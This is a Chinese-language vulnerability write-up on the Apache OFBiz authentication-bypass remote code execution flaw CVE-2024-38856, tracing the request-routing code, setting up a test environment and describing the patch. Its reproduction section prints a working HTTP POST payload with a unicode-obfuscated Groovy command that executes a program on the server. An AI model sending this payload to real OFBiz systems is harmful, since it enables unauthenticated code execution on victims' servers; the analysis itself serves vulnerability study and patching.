问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Apache OFBiz 远程代码执行漏洞(CVE-2024-38856)
漏洞分析
CVE-2024-38856的主要是*ControlServlet*和*RequestHandler*函数收到了不同的端点来处理,通过路径绕过导致的未授权漏洞
一、漏洞简介 ------ Apache OFBiz 是一个用于企业资源规划(ERP)的开源框架,它包含满足常见业务需求的 Web 应用程序,例如人力资源、会计、库存管理、客户关系管理、营销等。 CVE-2024-38856的主要是*ControlServlet*和*RequestHandler*函数收到了不同的端点来处理,通过路径绕过导致的未授权漏洞 二、影响版本 ------ <= Apache OFBiz 18.12.14 三、漏洞原理分析 -------- 首先分析路由情况(ofbiz用tomcat作为http容器,这里的大部分项目的web.xml配置差不了多少) 这里以webapp/webtools/WEB-INF/web.xml文件作为示例 这里先以post方式访问/webtools/control/forgotPassword/ProgramExport路径 data:image/s3,"s3://crabby-images/c2b29/c2b292fae5a62e39d6cf5797c3087a7e9ed10656" alt="image.png" ControlServlet类作为servlet业务类的处理器,在doGet方法上开始调试 data:image/s3,"s3://crabby-images/594dc/594dcbe8fe432ccc78f9d42dc9113f0cba0a4f47" alt="image.png" 这里前面的一大串方法都在设置request的属性,从185行开始获取handler处理器来处理请求 data:image/s3,"s3://crabby-images/d73ea/d73ea239820861a8066a5a270c431fa3dd7d69b8" alt="image.png" 跟进handler.doRequest()方法 data:image/s3,"s3://crabby-images/e5b4b/e5b4b5cd5b09a78e1cb95fc3603ae31e2e1375fc" alt="image.png" 这里判断请求的客户端地址是否为黑名单,然后获取所有webtools下的controller,因为这里请求的地址就是以/webtools开头的. controller的配置在webtools下的contoller.xml中配置 data:image/s3,"s3://crabby-images/3901f/3901fd92df704467ab6e5254e9e8767d8ace7dce" alt="image.png" 这里先从UtilHttp.getApplicationName获取了/webtools 然后进入RequestHandler.getRequestUri 这里调用了getPathInfo,所以传入的参数是/forgotPassword/ProgramExport data:image/s3,"s3://crabby-images/f065b/f065b18601ab70740f87431c04a4fc94101a8742" alt="image.png" 这里只返回第一个值,即forgotPassword 回到doRequest 继续进入getOverrideViewUri,传入的参数也是/forgotPassword/ProgramExport data:image/s3,"s3://crabby-images/315a3/315a3c7757c6433bda4aabb8addea1dd0680ca4d" alt="image.png" 也是以/作为分割,然后从第二个位置开始截取数组,返回最后一个位置的数据 这里也就是ProgramExport 回到doRequest 继续进入resolveURI data:image/s3,"s3://crabby-images/b5744/b5744ede4f28d8e3b95513c4dfc9fd6f5e5beace" alt="image.png" 这里在if中判断getRequestUri获取请求的基础路径(forgotPassword)是否纯在于requestMapMap 后续如果viewUri(就是调用的getOverrideViewUri)也存在于viewMapMap即将rmaps返回 rmaps是请求的路径业务类方法 回到doRequest data:image/s3,"s3://crabby-images/cf610/cf610dc4c2d28ce8e696669aad802947f255c577" alt="image.png" 这里在resolveMethod中判断请求的方法和rmaps中的方法是否对应,返回更细致的requestMap data:image/s3,"s3://crabby-images/f1a7f/f1a7ff7cf03e17a0a03bd63da9b254abd7a4acad" alt="image.png" 继续往下 data:image/s3,"s3://crabby-images/48007/48007c9f5ca339a288c8900b2a9dfd3c812ec807" alt="image.png" 这里在进入业务方法的时候需要校验登陆情况 data:image/s3,"s3://crabby-images/77f01/77f0135b4c8d394ad2d9fbb74af9da2f7344d2b7" alt="image.png" 因为forgotPassword对应的requestMap不需要鉴权,这里就绕过了安全检查 继续向下调试 data:image/s3,"s3://crabby-images/941da/941da2d24bd36b7232ff99475ba50e4762604bb2" alt="image.png" 在runEvent方法中,通过反射调用到forgotPassword的业务方法,不过漏洞和这里没有关系,只要业务的返回值为success即可 后续需要通过success获取到返回值的数据赋值给successResponse,然后传递给nextRequestResponse data:image/s3,"s3://crabby-images/5cd5b/5cd5ba5e76c3371e9a0c6f81273c5e44842afe62" alt="image.png" 继续往下 data:image/s3,"s3://crabby-images/f085b/f085bd20b8fa9a4eddac954bf8df5c15ea511403" alt="image.png" 这里的nextRequestResponse.type,其实是在配置文件中设置的 data:image/s3,"s3://crabby-images/3a51a/3a51a565de7d756c0a1b48c70e3a6dd636900515" alt="image.png" 这里判断业务返回的数据是否为success,并且overrideViewUri是否为null,最后设置viewName 那么这里因为请求的路径为/forgotPassword/ProgramExport 造成view的解析冲突,会进入到ProgramExport这个业务中 renderView方法就是在解析与ProgramExport对应的请求 groovyScripts/entity/ProgramExport.groovy data:image/s3,"s3://crabby-images/e9d59/e9d59f4e3028533f682abfb553230e94ca8ceb4f" alt="image.png" 四、环境搭建 ------ 下载18.12.14版本 <https://github.com/apache/ofbiz-framework/releases/tag/release18.12.14> 用idea打开之后运行gradle-build data:image/s3,"s3://crabby-images/1e613/1e61363f946e43139f1c77a3ea36cfb9d6869b92" alt="image.png" 这里会生成一个jar包,直接调试即可 data:image/s3,"s3://crabby-images/04298/04298a519d15b5f5d157d43af06f1c34efdfafa3" alt="image.png" 最后需要配置数据库,在根目录下运行gradlew loadAll加载所有数据正常调试 五、漏洞复现 ------ 发送payload ```POST Host: 127.0.0.1:8443 Cache-Control: max-age=0 Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 272 groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b ``` data:image/s3,"s3://crabby-images/fb662/fb662c1685798bdcfb480f5ce3dd8ddeed7c5dd6" alt="image.png" 六、漏洞修复 ------ 在18.12.15中修复了Request.resolveURI方法 data:image/s3,"s3://crabby-images/09047/09047dfaf008945ec18c50adbd439dc88989ba41" alt="image.png" 这里多了allowDirectViewRendering,不允许覆盖渲染模板了 以及EntitySQLProcessor和ProgramExport这两个sink都做了权限校验 data:image/s3,"s3://crabby-images/065c5/065c5d78b8fe7e33255dcf928f1b3ede26ddbfc6" alt="image.png" data:image/s3,"s3://crabby-images/46ccc/46cccbbcbce67c24ec855a02101ae4f27f04a381" alt="image.png"
发表于 2024-08-13 09:53:18
阅读 ( 4021 )
分类:
CMS
0 推荐
收藏
1 条评论
deger
1秒前
强
请先
登录
后评论
请先
登录
后评论
yrf2314
3 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!